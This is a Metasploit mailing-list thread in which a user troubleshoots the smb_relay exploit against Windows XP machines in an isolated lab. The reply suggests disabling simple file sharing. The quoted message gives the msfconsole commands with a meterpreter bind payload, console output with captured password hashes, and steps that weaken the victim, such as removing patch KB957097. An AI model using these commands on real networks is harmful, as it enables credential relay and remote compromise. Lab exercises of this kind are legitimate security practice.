Re: smb_relay returns "[-] Failed to authenticate"

[Brian <briaar () gmail com>]

Hi Christian,

On the xp machines, try going to tools->folder options->advanced? and
unchecking "Use simple file sharing" option.

-Brian

On Wed, Dec 29, 2010 at 12:18 PM, Christian Schäfer
<syrious3000 () hotmail de> wrote:
> Hello,
>
>
> I'm just trying to get the smb_relay exploit working on an isolated
> test-asset containing of 2 win xp sp3 machines with Metasploit Framework
> 3.5.1. for demonstration purpose.
>
> attacker: 192.168.69.7
> victim: 192.168.69.3
>
>
> To get the exploit working I uninstalled the Win Security Update KB957097
> (from both machines) which prevents the exploit.
>
> After that I set LocalSecuritySettings / LocalPolicies / SecurityOptions /
> NetworkAccess: Sharing and Security model for local accounts to:  "Classic"
> on the vicitim.
>
> Then I executed:  gpupdate /force in windows shell
>
>
> On the attacking machine I set following network config:
>
> > tcp/ip / advanced/wins:  disabled (to get port 139 free)
>
> > client for ms networks:   enabled
>
> > file & printer sharing...:  enabled
>
> I made a change in the registry to get port 445 free) by setting:
> [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
> "SMBDeviceEnabled"=dword:00000000
>
>
> I executed the exploit with the following commands and got a "Failed to
> authenticate" ...please help :(
> (SYRDSL = computer name , test = username and password)
>
> msf > use exploit/windows/smb/smb_relay
> msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/bind_tcp
> PAYLOAD => windows/meterpreter/bind_tcp
> msf exploit(smb_relay) > set SRVHOST 192.168.69.7
> SRVHOST => 192.168.69.7
> msf exploit(smb_relay) > exploit
> [*] Exploit running as background job.
> [*] Started bind handler
> [*] Server started.
> [*] Received 192.168.69.3:1079 \ LMHASH:00 NTHASH: OS:Windows 2002 Service
> Pack 3 2600 LM:Windows 2002 5.1
> [*] Sending Access Denied to 192.168.69.3:1079 \
> [*] Received 192.168.69.3:1079 SYRDSL\test
> LMHASH:3e5a5ee7d3fd22d72fc039c755c14c9c33eb1778f2f939cc
> NTHASH:1934e7b2bfe1bd8979b505fdcfbc03cc44bd94334991444b OS:Windows 2002
> Service Pack 3 2600 LM:Windows 2002 5.1
> [*] Authenticating to 192.168.69.3 as
> SYRDShttps://snt126.mail.live.com/default.aspx?rru=inbox&wa=wsignin1.0L\test...
> [*] Trying to AUTHENTICATE: username= test , domain= SYRDSL
> [-] Failed to authenticate as SYRDSL\test...
>
>
> On the victim machine I tried:
>
> typing in the explorer address line:  \\192.168.69.7\fakeShare\fakeFile.jpg
>
> or in windows shell: net use \\192.168.69.7\ipc$ to trigger the exploit
>
>
>
> I would apreciate any hint...because I urgently need to get it
> working...please help :/
> If i missed some important information  please tell and I will provide it.
>
> Cheers
> Christian
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework